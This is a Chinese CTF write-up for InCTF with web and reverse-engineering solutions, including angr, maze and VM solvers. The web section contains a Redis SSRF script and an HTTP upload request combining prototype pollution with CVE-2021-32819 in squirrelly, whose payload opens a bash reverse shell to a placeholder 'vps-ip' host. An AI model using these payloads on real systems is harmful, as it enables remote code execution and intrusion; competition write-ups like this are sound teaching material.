inctf解题paper

  • inctf解题paper已关闭评论
  • 11 views
  • A+
所属分类:CTF专场

web

MD Notes

gomarkdown模块在解析代码块的语法时,对于代码类型的标注没有进行实体编码。
故输入以下字符串便可导致xss
inctf解题paper
保存后,发送给机器人

随后vps监听静候佳音
inctf解题paper

Raas

inctf解题paper
inctf解题paper

import requests

url = "http://web.challenge.bi0s.in:6969/"


userID = "ccc"
data = {"url": "inctf://redis:6379/_%s" % "set " + userID + "_isAdmin yes\r\n"}
requests.post(url, data=data)
res = requests.get(url, cookies={"userID": userID})
print(res.headers["Set-Cookie"])

Json Analyser

waf.py中的ujson模块有解析问题,传入\u0073uperuser","name":"admin即可绕过拿到pin码
app.js中读取上传的package.json设置文件后展示。因为模板使用了旧版本squirrelly模块,存在CVE-2021-32819
此cve需要在模板render时传入{"defaultFilter":"e'); [js code];//"},但原代码中是

res.render('index.squirrelly', {'output':output})

无法直接传入defaultFilter。考虑在读取上传的package.json设置文件时可能存在原型链污染,故上传文件如下:

POST /upload HTTP/1.1
Host: jsonanalyser.challenge.bi0s.in:41897
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------4731849084053322511847680923
Content-Length: 1002
Origin: http://jsonanalyser.challenge.bi0s.in:51219
Connection: close
Referer: http://jsonanalyser.challenge.bi0s.in:51219/
Upgrade-Insecure-Requests: 1

-----------------------------4731849084053322511847680923
Content-Disposition: form-data; name="uploadFile"; filename="package.json"
Content-Type: application/octet-stream

{
"constructor":{"prototype":{"defaultFilter":"e')); let require = global.require || global.process.mainModule.constructor._load; require('child_process').exec('bash -c \"bash -i >& /dev/tcp/vps-ip/vps-port 0>&1\"'); //"}},
  "name": "aaa",
  "version": "1.0.0",
  "description": "",
  "main": "app.js",
  "dependencies": {
    "config-handler": "^2.0.3",
    "express": "^4.17.1",
    "express-fileupload": "^1.2.1",
    "nodemon": "^2.0.12",
    "squirrelly": "^8.0.8"
  },
  "devDependencies": {},
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "author": "",
  "license": "ISC"
}
-----------------------------4731849084053322511847680923
Content-Disposition: form-data; name="pin"

673307-0496-1001122
-----------------------------4731849084053322511847680923--

inctf解题paper

rev

find_plut0

签到题,直接用angr秒了

import angr
import claripy
from z3 import *
flag = claripy.BVS("flag", 8 * 30)
p = angr.Project("binaries/find_plut0")
base = 0x400000


state = p.factory.blank_state(addr=base + 0xBA0)


state.memory.store(base + 0x202100, flag)

sim = p.factory.simgr(state)

for byte in flag.chop(8):
    state.add_constraints(byte >= 32) # ' '
    state.add_constraints(byte <= 128) # '~'

def myfind(state):
    rip = state.solver.eval(state.regs.rip)
    print(hex(rip))
    return base + 0xADB  == rip


res = sim.explore(find=myfind, avoid=[base + 0xAFD])
print(res.found)
resState = res.found[0]
flag2 = resState.memory.load(base + 0x202100, 30)
print(resState.solver.eval(flag2, cast_to=bytes))
print(resState.solver.eval(flag, cast_to=bytes))

REplica

简单的 rust 逆向
输入由命令行输入,在比较位置下断点提取数据观察即可。

target = '0kedtZ6fYO3aX4lPNMSgQbRwh'
t1 = '0123456789XABCDEFGHIJKLMN'
t2 = 'NMKG98F76JED54LICB32HAX10'
t3 = []
result = [0] * 25
for c in t2:
    t3.append(t1.find(c))

for i in range(25):
    result[t3[i]] = target[i]
print("".join(result))

miz

简单的 rust 逆向,地图题

#include<iostream>
#include<cstdio>
using namespace std;
const int N=30;
int dx[]={-1,1,0,0};
int dy[]={0,0,-1,1};
char ha[]={'j','k','h','l'};
int a[N][N]={
{1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1},
{1,0,1,0,0,0,0,0,0,0,0,0,0,3,0,0,1,0,0,0,0,0,1,0,1},
{1,0,1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,0,1,1,1,0,1,0,1},
{1,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,1,0,0,0,1},
{1,0,1,1,1,1,1,1,1,0,1,0,1,1,1,1,1,1,1,0,1,1,1,1,1},
{1,0,0,0,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,0,1,0,0,0,1},
{1,0,1,1,1,1,1,0,1,1,1,0,1,0,1,1,1,0,1,1,1,1,1,0,1},
{1,0,0,0,1,0,1,0,0,0,0,0,1,0,0,0,1,0,0,0,1,0,0,0,1},
{1,1,1,0,1,0,1,0,1,1,1,1,1,1,1,0,1,1,1,0,1,0,1,1,1},
{1,0,1,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1},
{1,0,1,0,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1},
{1,0,1,0,1,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,1},
{1,0,1,0,1,0,1,1,1,0,1,1,1,1,1,0,1,0,1,0,1,0,1,0,1},
{1,0,0,0,1,0,0,0,1,0,0,0,1,0,1,0,0,0,1,0,0,0,1,0,1},
{1,0,1,1,1,1,1,1,1,1,1,0,1,0,1,1,1,1,1,1,1,1,1,0,1},
{1,0,0,0,1,0,0,0,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,0,1},
{1,0,1,0,1,0,1,1,1,1,1,1,1,0,1,0,1,1,1,0,1,1,1,0,1},
{1,0,1,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,1,0,1,0,1,0,1},
{1,0,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,0,1,0,1,0,1,0,1},
{1,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,1,0,1},
{1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,0,1,1,1,1,1,0,1,0,1},
{1,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,1,0,0,0,1,0,1,0,1},
{1,1,1,0,1,0,1,1,1,0,1,1,1,1,1,0,1,0,1,0,1,0,1,0,1},
{1,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,1,0,1},
{1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,1,1,1,1,1}};
int sx=1,sy=0xD,s[1005],top;
bool v[N][N];
void dfs(int x,int y)
{
    // if(y==1&&x==0xc)
        // puts("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!");
    if(a[x][y]==2)
    {
        for(int i=1;i<=top;i++)
            printf("%c",ha展开]);
        puts("");
        // exit(0);
        return;
    }
    for(int i=0;i<4;i++)
        if(x+dx[i]>=0&&x+dx[i]<25&&y+dy[i]>=0&&y+dy[i]<25&&!v[x+dx[i]][y+dy[i]]&&a[x+dx[i]][y+dy[i]]!=1)
        {
            v[x+dx[i]][y+dy[i]]=1;
            s[++top]=i;
            dfs(x+dx[i],y+dy[i]);
            v[x+dx[i]][y+dy[i]]=0;
            top--;
        }
}
int main()
{
    // cout<<a[sx][sy]<<endl;
    v[sx][sy]=1;
    dfs(sx,sy);
    return 0;
}

Adventures of Lonely Knight

模拟器 + 调试器: https://github.com/SourMesen/Mesen/releases

参考链接: https://blog.attify.com/flare-on-6-ctf-writeup-part8/

这道题,思路大概是先找到血量,再下内存断点找到读写血附近的代码。

再分析死亡逻辑,找到关键变量地址 0x68 , 只要该值不为 0 就可以直接通关。

钥匙判断逻辑

inctf解题paper

FlagChecker

虚拟机逆向,需要编写 decompiler

bytecode = [0x00000006, 0x00000000, 0x0000000B, 0x00000006, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000000, 0x00000006, 0x00000008, 0x0000000B, 0x00000005, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000001, 0x00000006, 0x00000010, 0x0000000B, 0x00000008, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000002, 0x00000006, 0x00000018, 0x0000000B, 0x00000003, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000003, 0x00000006, 0x0000001F, 0x0000000B, 0x00000003, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000004, 0x00000009, 0x00000003, 0x0000008C, 0x00000004, 0x00000002, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000006, 0x00000001, 0x0000000B, 0x00000002, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000000, 0x00000006, 0x00000009, 0x0000000B, 0x00000006, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000001, 0x00000006, 0x00000011, 0x0000000B, 0x00000001, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000002, 0x00000006, 0x00000019, 0x0000000B, 0x00000000, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000003, 0x00000009, 0x00000003, 0x000000E1, 0x00000004, 0x00000002, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000006, 0x00000002, 0x0000000B, 0x00000000, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000000, 0x00000006, 0x0000000A, 0x0000000B, 0x00000004, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000001, 0x00000006, 0x00000012, 0x0000000B, 0x00000005, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000002, 0x00000006, 0x0000001A, 0x0000000B, 0x00000002, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000003, 0x00000006, 0x00000020, 0x0000000B, 0x00000003, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000004, 0x00000009, 0x00000003, 0x0000012B, 0x00000004, 0x00000002, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000006, 0x00000003, 0x0000000B, 0x00000008, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000000, 0x00000006, 0x0000000B, 0x0000000B, 0x00000005, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000001, 0x00000006, 0x00000013, 0x0000000B, 0x00000003, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000002, 0x00000006, 0x0000001B, 0x0000000B, 0x00000007, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000003, 0x00000009, 0x00000003, 0x00000167, 0x00000004, 0x00000002, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 